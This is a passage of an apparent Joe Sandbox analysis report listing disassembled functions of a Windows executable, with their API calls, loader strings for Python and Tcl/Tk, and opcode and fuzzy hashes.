                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 3215553584-0
                                                                                        • Opcode ID: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                                        • Instruction ID: a89fb71c7bdaf2484241b40750284718635c03b75a457bec18cb4612cb28a544
                                                                                        • Opcode Fuzzy Hash: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                                        • Instruction Fuzzy Hash: F9E08C92F0864362FA187EAA64A22799050BFAC322FD0A4B0D9088A283ED1C7C548631
                                                                                        Function 00007FF7CA7ADEA8 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • HeapAlloc.KERNEL32(?,?,00000000,00007FF7CA7AA63A,?,?,?,00007FF7CA7A43FD,?,?,?,?,00007FF7CA7A979A), ref: 00007FF7CA7ADEFD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocHeap
                                                                                        • String ID:
                                                                                        • API String ID: 4292702814-0
                                                                                        • Opcode ID: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                        • Instruction ID: b412a0d3dfc474146afc43433a8f44b6b708c68f14c67bf8664a1ce778e39509
                                                                                        • Opcode Fuzzy Hash: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                        • Instruction Fuzzy Hash: 01F04F55B09247A1FE547E637A713B692947FACB62FC860B1DD0E862C2ED1CAD454230
                                                                                        Function 00007FF7CA7AC90C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • HeapAlloc.KERNEL32(?,?,?,00007FF7CA79FFB0,?,?,?,00007FF7CA7A161A,?,?,?,?,?,00007FF7CA7A2E09), ref: 00007FF7CA7AC94A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocHeap
                                                                                        • String ID:
                                                                                        • API String ID: 4292702814-0
                                                                                        • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                        • Instruction ID: 9b5f142718a156e89b28036550ac1cbc8fdf74b58dbe368036d57a75087aa942
                                                                                        • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                        • Instruction Fuzzy Hash: 04F03A51B19247A5FE547EE3797167591807F9CBB3F88A2B09D2E462C1DE1CA8448130

                                                                                        Non-executed Functions

                                                                                        Function 00007FF7CA79C44C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 3140674995-0
                                                                                        • Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                        • Instruction ID: fe7a976ad11d79304e168e7d829824812e7c869bcf1f32b4933ca3257193fedb
                                                                                        • Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                        • Instruction Fuzzy Hash: 68315EB2608B818AFB609F61F8507EEB364FB98755F84403ADA4D47B94DF38C548C724
                                                                                        Function 00007FF7CA7929E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$ErrorFormatLast
                                                                                        • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                                                        • API String ID: 3971115935-1149178304
                                                                                        • Opcode ID: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                                        • Instruction ID: 4250e1d6aa25750368fcfd56bc4043e7a89557ad79938c11b45ca0487a98d378
                                                                                        • Opcode Fuzzy Hash: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                                        • Instruction Fuzzy Hash: 26214F72618B8192F720AF21F4606EAA364FB8C795F800136EE8D53A98DF3CD5468B50
                                                                                        Function 00007FF7CA7B4F10 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _get_daylight.LIBCMT ref: 00007FF7CA7B4F55
                                                                                          • Part of subcall function 00007FF7CA7B48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7CA7B48BC
                                                                                          • Part of subcall function 00007FF7CA7A9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF7CA7B2032,?,?,?,00007FF7CA7B206F,?,?,00000000,00007FF7CA7B2535,?,?,?,00007FF7CA7B2467), ref: 00007FF7CA7A9C6E
                                                                                          • Part of subcall function 00007FF7CA7A9C58: GetLastError.KERNEL32(?,?,?,00007FF7CA7B2032,?,?,?,00007FF7CA7B206F,?,?,00000000,00007FF7CA7B2535,?,?,?,00007FF7CA7B2467), ref: 00007FF7CA7A9C78
                                                                                          • Part of subcall function 00007FF7CA7A9C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7CA7A9BEF,?,?,?,?,?,00007FF7CA7A9ADA), ref: 00007FF7CA7A9C19
                                                                                          • Part of subcall function 00007FF7CA7A9C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7CA7A9BEF,?,?,?,?,?,00007FF7CA7A9ADA), ref: 00007FF7CA7A9C3E
                                                                                        • _get_daylight.LIBCMT ref: 00007FF7CA7B4F44
                                                                                          • Part of subcall function 00007FF7CA7B4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7CA7B491C
                                                                                        • _get_daylight.LIBCMT ref: 00007FF7CA7B51BA
                                                                                        • _get_daylight.LIBCMT ref: 00007FF7CA7B51CB
                                                                                        • _get_daylight.LIBCMT ref: 00007FF7CA7B51DC
                                                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CA7B541C), ref: 00007FF7CA7B5203
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                        • String ID:
                                                                                        • API String ID: 4070488512-0
                                                                                        • Opcode ID: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                                        • Instruction ID: 475dcff8af34952df7fbc75609c0b8e964b7cda9e0bb69a7eacc0b0c14469098
                                                                                        • Opcode Fuzzy Hash: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                                        • Instruction Fuzzy Hash: EFD19FA6E0874286F720BF27B8601B9A3A1FB687A6FC44175DE0E47695DF3CE451C360
                                                                                        Function 00007FF7CA7A9924 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 1239891234-0
                                                                                        • Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                        • Instruction ID: 00dd2e426002bad5361d083163e6dfe6f1aeb458ce75c1571a0537030636f3de
                                                                                        • Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                        • Instruction Fuzzy Hash: 9D318F32608B8195EB20DF26F8506EEB3A4FB88765F900136EE9D47B54DF38C555CB10
                                                                                        Function 00007FF7CA7B0B84 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 2227656907-0
                                                                                        • Opcode ID: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                                                        • Instruction ID: d656eb3652bd55c336a83db04dca9c53e0febc12def27aa4012eec6cd49f9ee6
                                                                                        • Opcode Fuzzy Hash: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                                                        • Instruction Fuzzy Hash: B5B1B5A2B1878241FA60AF23B4285B9A350FB68BF5F845171EE5D07BD5DF3CE4428314
                                                                                        Function 00007FF7CA7B518C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _get_daylight.LIBCMT ref: 00007FF7CA7B51BA
                                                                                          • Part of subcall function 00007FF7CA7B4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7CA7B491C
                                                                                        • _get_daylight.LIBCMT ref: 00007FF7CA7B51CB
                                                                                          • Part of subcall function 00007FF7CA7B48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7CA7B48BC
                                                                                        • _get_daylight.LIBCMT ref: 00007FF7CA7B51DC
                                                                                          • Part of subcall function 00007FF7CA7B48D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7CA7B48EC
                                                                                          • Part of subcall function 00007FF7CA7A9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF7CA7B2032,?,?,?,00007FF7CA7B206F,?,?,00000000,00007FF7CA7B2535,?,?,?,00007FF7CA7B2467), ref: 00007FF7CA7A9C6E
                                                                                          • Part of subcall function 00007FF7CA7A9C58: GetLastError.KERNEL32(?,?,?,00007FF7CA7B2032,?,?,?,00007FF7CA7B206F,?,?,00000000,00007FF7CA7B2535,?,?,?,00007FF7CA7B2467), ref: 00007FF7CA7A9C78
                                                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CA7B541C), ref: 00007FF7CA7B5203
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                        • String ID:
                                                                                        • API String ID: 3458911817-0
                                                                                        • Opcode ID: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                                                        • Instruction ID: 63bd7a8fefcc0e4afcc44a7586fe947c1790870a0260412d6fd5c52c00f07757
                                                                                        • Opcode Fuzzy Hash: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                                                        • Instruction Fuzzy Hash: 04517BB2A1874286F720FF23F8A15A9A760FB5C7A6F844175EE0D43696DF3CE4408760
                                                                                        Function 00007FF7CA7950B0 Relevance: 157.9, APIs: 44, Strings: 46, Instructions: 364libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(?,00007FF7CA795C57,?,00007FF7CA79308E), ref: 00007FF7CA7950C0
                                                                                        • GetProcAddress.KERNEL32(?,00007FF7CA795C57,?,00007FF7CA79308E), ref: 00007FF7CA795101
                                                                                        • GetProcAddress.KERNEL32(?,00007FF7CA795C57,?,00007FF7CA79308E), ref: 00007FF7CA795126
                                                                                        • GetProcAddress.KERNEL32(?,00007FF7CA795C57,?,00007FF7CA79308E), ref: 00007FF7CA79514B
                                                                                        • GetProcAddress.KERNEL32(?,00007FF7CA795C57,?,00007FF7CA79308E), ref: 00007FF7CA795173
                                                                                        • GetProcAddress.KERNEL32(?,00007FF7CA795C57,?,00007FF7CA79308E), ref: 00007FF7CA79519B
                                                                                        • GetProcAddress.KERNEL32(?,00007FF7CA795C57,?,00007FF7CA79308E), ref: 00007FF7CA7951C3
                                                                                        • GetProcAddress.KERNEL32(?,00007FF7CA795C57,?,00007FF7CA79308E), ref: 00007FF7CA7951EB
                                                                                        • GetProcAddress.KERNEL32(?,00007FF7CA795C57,?,00007FF7CA79308E), ref: 00007FF7CA795213
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc
                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                        • API String ID: 190572456-2007157414
                                                                                        • Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                        • Instruction ID: 6a1d44ed736f87ffff304ba56ebd9f7ecb2b410d02acf142ee2e937d6cfa311f
                                                                                        • Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                        • Instruction Fuzzy Hash: 9E1257A494DB1391FA55BF2AB8705B4A3A0BF5C777FD454B6CC0E11290AF7CE54883A0
                                                                                        Function 00007FF7CA796EA0 Relevance: 119.3, APIs: 33, Strings: 35, Instructions: 280libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc
                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                        • API String ID: 190572456-3427451314
                                                                                        • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                        • Instruction ID: 9b3d05770ecc89beee14b381fb1cea03eb6316f6359063decbe3b36aff332833
                                                                                        • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                        • Instruction Fuzzy Hash: 94E1C6A490DB4790FA59BF26B9705B4A2A5BF5C772FC851F2DC0D026A5EF3CA548C320
                                                                                        Function 00007FF7CA7977D0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 115COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF7CA7986B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7CA793FA4,00000000,00007FF7CA791925), ref: 00007FF7CA7986E9
                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7CA797C97,?,?,FFFFFFFF,00007FF7CA793834), ref: 00007FF7CA79782C
                                                                                          • Part of subcall function 00007FF7CA7926C0: MessageBoxW.USER32 ref: 00007FF7CA792736
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                        • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                        • API String ID: 1662231829-930877121
                                                                                        • Opcode ID: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                                        • Instruction ID: 5dc50df7de2b082dede527c16f825fa99ee6ee66bed4b58758fc4901ef324e6a
                                                                                        • Opcode Fuzzy Hash: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                                        • Instruction Fuzzy Hash: 59419351B2D64285FA50BF36F871AB9E251FF9C7B2FC050B2DA4E42695EE2CE5048360
                                                                                        Function 00007FF7CA7920F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                        • String ID: P%
                                                                                        • API String ID: 2147705588-2959514604
                                                                                        • Opcode ID: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                        • Instruction ID: bb9592179217671ab7e59fdcb074e835e294c9e149e9b733d173982842dd1335
                                                                                        • Opcode Fuzzy Hash: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                        • Instruction Fuzzy Hash: 3C51D566614BA186E624AF32B4185BAF7A1F798B72F404131EFDE43694DF3CD085CB20
                                                                                        Function 00007FF7CA7A55A0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 493COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
